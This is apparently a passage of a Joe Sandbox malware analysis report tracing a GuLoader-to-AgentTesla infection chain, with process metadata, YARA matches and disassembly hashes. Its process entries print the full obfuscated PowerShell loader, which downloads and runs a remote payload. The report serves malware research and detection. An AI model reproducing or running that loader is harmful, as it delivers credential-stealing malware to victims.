eRevolnConseSGarrukAggadASavsmbGrammeTiderT Nabo) Kll ');Rationaliseringsgevinsten (Efterbevilget 'Nun.i$KalkbGBiklal Afsko b udBOmsteA Ko llNatur:prolefV lenLCockbESubdam UndeeTek trFor u=Dyble$ UncoPTll.rARegisPVarena KundlmagneiOut,dZCeph.aIslett PolyiO,datoR prsN Unf .S mulSOutleUIntelB UncaSEco.ttmaughRRankiI trykNUnrumgVog t(Laxis$G agufKlista nfixSAlk hTYderrG .abrR KartO Cor e R dldStrmpEantho,Gambo$ Bl tu Un,eNArbejtrubelRselveAUn erdMilliILanugT BegrI Bryno confNst nbaLbebal En e)Ros n ');Rationaliseringsgevinsten $Flemer;"
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2301285247.0000011FA909E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:3
                                                      Start time:02:46:08
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:02:46:27
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreewYUnd,sPUnredRUrinro SubjtYrke,OHunknCSportO inoll,eris Carci=Tribr Teglh[CylinnUds iETunnatDeluc. ugtaSUrstre P rocHofstuOrdfrrArmgaIDagmatB.sunyTonetpUnm.rrEtheroEncumtIstanOProtecTelemoLiannLNewfoTUnsphy LepipRejs,eForgi]Bru,s: Diff:Voca,tI pudl Til.sGanga1Efter2 Veks ');$dyrlgeforeningens=$Afmattede[0];$vang=(Efterbevilget 'Knkbr$An imGUnideLOpistO dataBEnth aMaglelBootm:FletkpHisseRNarraePellaaEjvindAfskrvBerkee ataoRFaks THa,seEPleisn Shu,CBacalY aram=SeksanTmmereD,llsw ieti-PingeODeviaBRetfrjPalaeeBriquc Era TArbej PejakS ammeyUdpnsS count Opile Remam E,ik. P,liNAnbraeInfratBetal. Hjr WRenowEBed abPineccKontoLEklipI trkuEKil.gNBristtB.nde ');Rationaliseringsgevinsten ($vang);Rationaliseringsgevinsten (Efterbevilget 'Tentk$ amenPNo.corRet aeOversaTal,sd Formva tmaeAromerB rtltSystee tilln enfrc jlpeyHverd.OlenoHProfie ittia IndtdWineseSubnerShi,ts Peda[avlsd$ aidLfelsoainvacu aanl UnexaSpedau Stri] uns =Flues$ Te ePE sperAnalfoStyrtvErym oA agyk MultaOesopt Sci rVilje ');$Lensmen=Efterbevilget 'Bu.dm$RespeP BackrSk aae VintaOps gdBrugtvtvisteNarkorDoctotAnti,eCellun.unolc GilbyU,lng.OversD ondoStroswTappanMaa el EfteoHelheaAbrazdSpigeF OrkniEnvellSannheKir r(Vntes$Afslud,nderyYnglerStersl AmatgLotteeTimevf tagoKas.rr.onexeAtombn egrniNattenPrs igFrikaeGiantn peresplant,Lnudv$billensme ed EksplPreoba BlomnInderdCrappe KonsnReolsd Se,eeTarsosPerso)Bug,e ';$ndlandendes=$Placeholders;Rationaliseringsgevinsten (Efterbevilget ' Ud a$CacheGUnvanl InstOCoryzban,spACa.cel.rein:Gl,ucRVagtkE .yttSSigtvHEksklvAfvaneTelemrChiliV ,limESerriN ResuESaf e=Bevis(GrounTOphjnEforansKsersTOpbyg-UnjagPHigdiAR evatPlanfHSelen Nonvi$Pee eNKaffeD BiotLTri,ha S olnSphendun,aseLareeNdydspdGastre reinsDemer) rem ');while (!$Reshvervene) {Rationaliseringsgevinsten (Efterbevilget 'Intra$BefstgBndsllFrugaoRepe bFoldeaCurr lTospr:S,lekTCeru r UklaeKistetUnpr tI dtseSylten FiltaIssk,aRygmar scifStipudSpielsFraileMultilSensisMis edMindsaTankegboldjeB.tra=Arqua$StjertThorarO givu traneB.lec ') ;Rationaliseringsgevinsten $Lensmen;Rationaliseringsgevinsten (Efterbevilget ' atrosRessoT colya yaerR DragTKardi- MellSDevotlDrsp E arvee angp D.ce ispe4 uld ');Rationaliseringsgevinsten (Efterbevilget 'Delim$Sl gmGBetonl ElemOW.iribtemp,APrayeLTjmo.:Prci rever E AerosBe stHSk ndvGalatEBarberBillyVYu upEFrimnnbaledEKisss=Arbut(Moya TCatureapplaS Sat.TRe de- nlupFryseaUneratDeterHSynde F.ter$S atsnGedesdGr.ssLShi aaDetalNFiftyDF siue Sp,in UndrDKunstEB rrishjem )Grupp ') ;Rationaliseringsgevinsten (Efterbevilget ' Mods$PilkegGleamlMil eoLkagebMaculaSminkL T ls:GodstSudrejvAftr IErythNA ditg ForrtPrepra,npresCopa KParagEFortinUndem4 ill= Umaa$BandwgTid sLBanegOUnca.b MiniATorsilUltra:LemmaAAgioed QuasrKenloeEconos lantSLiveteKobbeK paahAUmbe t BrysAD sseL Mid.O F ruGNiece+Syll +Overr%Ps.ro$ AnchA HuskfKesslm BrosAUshert HuslTStienESleepDDyrknEUncon.,ndercSkeweO.rencuTr.chn BrepTUfejl ') ;$dyrlgeforeningens=$Afmattede[$Svingtasken4];}$Fastgroede=329859;$Untraditional=31905;Rationaliseringsgevinsten (Efterbevilget 'Preex$Ba,gaGFuldhLSkrifODis eBhemmeaFlit L Z,la:SnverDRi gsEAdganNSa rrTDyrehe .kspRloko Opp,r= Bico llebrgFeltpechevrtCho b-Odin cErgoto V riNNaigitBaro E,estuNFirest Suto Slad $PreacN CharDFilovL F.rmA CompNBulledKommeEAff.aNBgegrdPlacaeNuragsExhal ');Rationaliseringsgevinsten (Efterbevilget 'Vvest$TangogO dunlO,reroM,skibPosteaAmb,slI.pos:Fi keVMikroenybodntinglsCapack Charain esbSko aestu,stRea i Forpl=Re li Nonsl[Ba.beSS aady Si is TruntBumbleKun emT phu.teen C FossoMindsnGenklvS.vbreCu,arrT.nontJul,b]Grapi:N,egt:PlanlFUnbewrGliddo RegimGramiBSprngaRaadisT opieVinte6 acre4 UnthSLsnintcuriarUnshiiTransnAnordgE sek( Fadl$L ninDPrebeeOutprnTuri t ajaveServirtrans)sen l ');Rationaliseringsgevinsten (Efterbevilget 'Micro$StudsGbaobaLDis.aoSube bFil yASbaikLBorts:Arrhyp ytiANonplpSal,saMorg LBankeIAlluvZFiltea V.tatEm ndiDa seo Tra,n Flot Gr.na=Inter A gna[SgerksLandsySpie,sGrundT verE BuddMKdben.Br.lgtGstfreWilfuXM,lenTUnsla.Kna.sEPlateNsa meCSalicOata iD AmouI.ndelnErhv.g Samm]Count:Gummi:CrenoaK,aliSStar.Ckr gsI AttriHaan .CentrG UdskEStyret Pr.iSIntertd.skeR HodoiSl gtnE,surgHalvg(Koal $Trkk VVejr eRevolnConseSGarrukAggadASavsmbGrammeTiderT Nabo) Kll ');Rationaliseringsgevinsten (Efterbevilget 'Nun.i$KalkbGBiklal Afsko b udBOmsteA Ko llNatur:prolefV lenLCockbESubdam UndeeTek trFor u=Dyble$ UncoPTll.rARegisPVarena KundlmagneiOut,dZCeph.aIslett PolyiO,datoR prsN Unf .S mulSOutleUIntelB UncaSEco.ttmaughRRankiI trykNUnrumgVog t(Laxis$G agufKlista nfixSAlk hTYderrG .abrR KartO Cor e R dldStrmpEantho,Gambo$ Bl tu Un,eNArbejtrubelRselveAUn erdMilliILanugT BegrI Bryno confNst nbaLbebal En e)Ros n ');Rationaliseringsgevinsten $Flemer;"
                                                      Imagebase:0xfb0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2495915604.0000000008430000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2479023084.00000000056A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2496426484.000000000BF75000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:02:46:27
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:02:46:47
                                                      Start date:24/10/2024
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0x990000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3357530310.0000000024868000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3357530310.0000000024845000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.3340834234.0000000007805000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF848D4C536 Relevance: .5, Instructions: 474COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2308794465.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848d40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f096cb27daa8dbc6d1ca40f65c1723e3bff07af2ce9b116e6d12911c64f24f36
                                                        • Instruction ID: 2daf384ae1a0e1b0f1aa52a62d1cc03f0309b127cf37c4e7e60e1e2bdca66b56
                                                        • Opcode Fuzzy Hash: f096cb27daa8dbc6d1ca40f65c1723e3bff07af2ce9b116e6d12911c64f24f36
                                                        • Instruction Fuzzy Hash: 7DF1B43090DA8D8FEBA8EF28C8557E937E1FF54350F14426EE84DC7295CB3899458B85
                                                        Function 00007FF848D4D2E2 Relevance: .5, Instructions: 460COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2308794465.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848d40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac1a6b7b00c6df44d88d0d57c2fde485cb915dba79c9cbbe255bc42c106b3598
                                                        • Instruction ID: 9e6cbad071693fc58290008d86ce7b80b2ace1a4b7333f0ee9312656e085222b
                                                        • Opcode Fuzzy Hash: ac1a6b7b00c6df44d88d0d57c2fde485cb915dba79c9cbbe255bc42c106b3598
                                                        • Instruction Fuzzy Hash: D8E1D330A0DA4D8FEBA8EF28C8557E977D1EB55350F14426ED84EC7295CF38A8448B81
                                                        Function 00007FF848D4EC73 Relevance: .7, Instructions: 652COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2308794465.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848d40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2f57596c179e398f91d055a88d45af0c61d7f74c786cb127b7cb53767c8a7ff7
                                                        • Instruction ID: 0ab4652801bb8fb9f2d4fc7b0a4da27229cc8348b39d65b8cde565064e773524
                                                        • Opcode Fuzzy Hash: 2f57596c179e398f91d055a88d45af0c61d7f74c786cb127b7cb53767c8a7ff7
                                                        • Instruction Fuzzy Hash: 4DE16E30A1DA4D8FDF88EF58C495BA97BE1FFA8750F14016AE409D7295CB34E885CB81
                                                        Function 00007FF848E17175 Relevance: .4, Instructions: 423COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2309761911.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58494d1e38b4bc367c2bbd46ab70c1cd162449ac515179101f39829a3a6e74a7
                                                        • Instruction ID: 1e8d33b802a5f6811e2a86d17334f93dfbccec0d8d3cf4a6fd62104151cc8db0
                                                        • Opcode Fuzzy Hash: 58494d1e38b4bc367c2bbd46ab70c1cd162449ac515179101f39829a3a6e74a7
                                                        • Instruction Fuzzy Hash: FBD15431E0EA8A5FE7D5AB6858555B9BBE0FF46790F0800FAE44DC7097DB28A801C365
                                                        Function 00007FF848E146C9 Relevance: .4, Instructions: 360COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2309761911.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03357b48c44d40c68ae24e159405d481cd9f3c7403438b578f11909022ba9757
                                                        • Instruction ID: 5f6f0c5e427a36adbcb45fc4654085e0099676c487def817c89f3435d750c681
                                                        • Opcode Fuzzy Hash: 03357b48c44d40c68ae24e159405d481cd9f3c7403438b578f11909022ba9757
                                                        • Instruction Fuzzy Hash: AFA15A31E1DA864FE7E9AE2858156B577D2FF427A8F4801BED40DC72D3DF28A8018356
                                                        Function 00007FF848D4CEF6 Relevance: .3, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2308794465.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848d40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 432bafb37c3198dd078f491d8d20fddf9a6eff5b0b48a5f1374c8a0a04d99a7a
                                                        • Instruction ID: efbc68e9eb2dbe95ea1b6f297ffd2f74d451068b2a622f495a17200a5c75f759
                                                        • Opcode Fuzzy Hash: 432bafb37c3198dd078f491d8d20fddf9a6eff5b0b48a5f1374c8a0a04d99a7a
                                                        • Instruction Fuzzy Hash: EBB1B53050DA8D4FDBA8EF28C8557E93BD1EF55350F04426EE84EC7292CB3499458B86
                                                        Function 00007FF848FC0001 Relevance: .2, Instructions: 208COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2312866240.00007FF848FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96642cdd10003930d009db56c9439f1338f20bbe7f32c31ae76ae67ab29a23c7
                                                        • Instruction ID: 22a69f8a962e89ae2bb86cf24033da9ea48a6782118d594a69c355b6f2339a90
                                                        • Opcode Fuzzy Hash: 96642cdd10003930d009db56c9439f1338f20bbe7f32c31ae76ae67ab29a23c7
                                                        • Instruction Fuzzy Hash: AB51E132D4DBCA8FE796BB2858545B47BE1FF96250F0900FBC448CB1E3DA18A946C355
                                                        Function 00007FF848FC0555 Relevance: .2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2312866240.00007FF848FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848fc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cfd4e3d0210dcdca044405c52670f4323d8e96201211a631c0cec8b131e475ee
                                                        • Instruction ID: ec4351c830a13a82713d11d14f8b8d2472f828cb8b03a9715416a3710b487400
                                                        • Opcode Fuzzy Hash: cfd4e3d0210dcdca044405c52670f4323d8e96201211a631c0cec8b131e475ee
                                                        • Instruction Fuzzy Hash: E551E131D0EA865FE75AFB2858551A8BBE1FF95350F0800FAC448871D3DF28A94A8756
                                                        Function 00007FF848E149CB Relevance: .2, Instructions: 162COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2309761911.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 85e719487fb48683bc2d0ad2c4b7d0b95f9757ffe3a7283c54ae5bf4dfc8504f
                                                        • Instruction ID: 57a291c60d7614210ce942faee43f8b2b8b853a969c10e0e0aca2f946b06a0d5
                                                        • Opcode Fuzzy Hash: 85e719487fb48683bc2d0ad2c4b7d0b95f9757ffe3a7283c54ae5bf4dfc8504f
                                                        • Instruction Fuzzy Hash: E3518521D0E7C54FE39BAB3858655A47FA1EF43654F4A01FBD088CB1A3D96C4C45C32A
                                                        Function 00007FF848E14854 Relevance: .1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2309761911.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 273564386d0c0e9a182a2d35a756f19276726285c6360ce9bece592d1832c2d5
                                                        • Instruction ID: 85ea7bad6991b9e2a3616db8053e26283657d94d74ab587650bcaa109fa51f60
                                                        • Opcode Fuzzy Hash: 273564386d0c0e9a182a2d35a756f19276726285c6360ce9bece592d1832c2d5
                                                        • Instruction Fuzzy Hash: E0210421E1EA964FE3E9BA2C545527466D3FF417A8F4801BAE00DC72D3DF29AC054319
                                                        Function 00007FF848D4C9F4 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2308794465.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848d40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 078a5000b75f55adff523d35f9a3649f574849b177b6345117b6dd1e7d8308c1
                                                        • Instruction ID: e79c46ff25c34fd0d3e405b5d2b86a824f0caebaa03121c20bbeae3162e6001c
                                                        • Opcode Fuzzy Hash: 078a5000b75f55adff523d35f9a3649f574849b177b6345117b6dd1e7d8308c1
                                                        • Instruction Fuzzy Hash: 6831D93091A64E8EFBF8EF19CC1ABF93294FF41799F400239D44D87192CB796949CA15
                                                        Function 00007FF848E1189F Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2309761911.00007FF848E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848e10000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07ea43a92e5f5e78cf33eafef8a04ee5edeb9fff2d478c4fb1e454befe7fd297
                                                        • Instruction ID: f8c4404d50197a429467197665985ad3f8a75fdf5d2af48f6a3c9e433492faff
                                                        • Opcode Fuzzy Hash: 07ea43a92e5f5e78cf33eafef8a04ee5edeb9fff2d478c4fb1e454befe7fd297
                                                        • Instruction Fuzzy Hash: 78210412E0FAC65FF395A63C28551746BE0FF56A90F0941FAD058C71D3DD2C4C49432A
                                                        Function 00007FF848D43945 Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2308794465.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ff848d40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                        • Instruction ID: 6710d8b329bd3beaab4c595b8babbffce7c58ee02f24889e49b8b0f37ea2422b
                                                        • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                        • Instruction Fuzzy Hash: 4001447115CB084FD748EF0CE451AB5B7E0FB95364F10056DE58AC3655D726E881CB45

                                                        Executed Functions

                                                        Function 044EEB70 Relevance: .3, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fa62db47f7f1a9552bf620b511f8c6cf846f9f0d53e1d69d27b6020cecf04c59
                                                        • Instruction ID: 4c38c5fb8c9cddd7484044adc20452dd04cb123c600763f14e915f4cfa9e7661
                                                        • Opcode Fuzzy Hash: fa62db47f7f1a9552bf620b511f8c6cf846f9f0d53e1d69d27b6020cecf04c59
                                                        • Instruction Fuzzy Hash: D0B15070E00209DFDF14CFAAC9857AEBBF2EF88305F24852AD415A7354EB75A845CB85
                                                        Function 044EF440 Relevance: .3, Instructions: 266COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a1160ff810ddfaabe38c1350ed09ddb876487278aee0f455d2e80bcf127811ad
                                                        • Instruction ID: 4798d92c8daf75b2917118d72af7005fa905b162560baa3a58e1d3fe9a0ea9bf
                                                        • Opcode Fuzzy Hash: a1160ff810ddfaabe38c1350ed09ddb876487278aee0f455d2e80bcf127811ad
                                                        • Instruction Fuzzy Hash: F0B17270E00209DFDF10CFAAD9857AEBBF2AF88315F14852AD414E7354EB74A845CB85
                                                        Function 072F83E8 Relevance: 20.6, Strings: 16, Instructions: 601COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-255254199
                                                        • Opcode ID: 165ce7306e34849b1ca43327abf67c27fb6b9ca481bd4d1062d12a6384b01b63
                                                        • Instruction ID: 1a1f1811cd66336fb291e2a6155cd5e20235747a0dfe5d4ad4f75afd9b781c3c
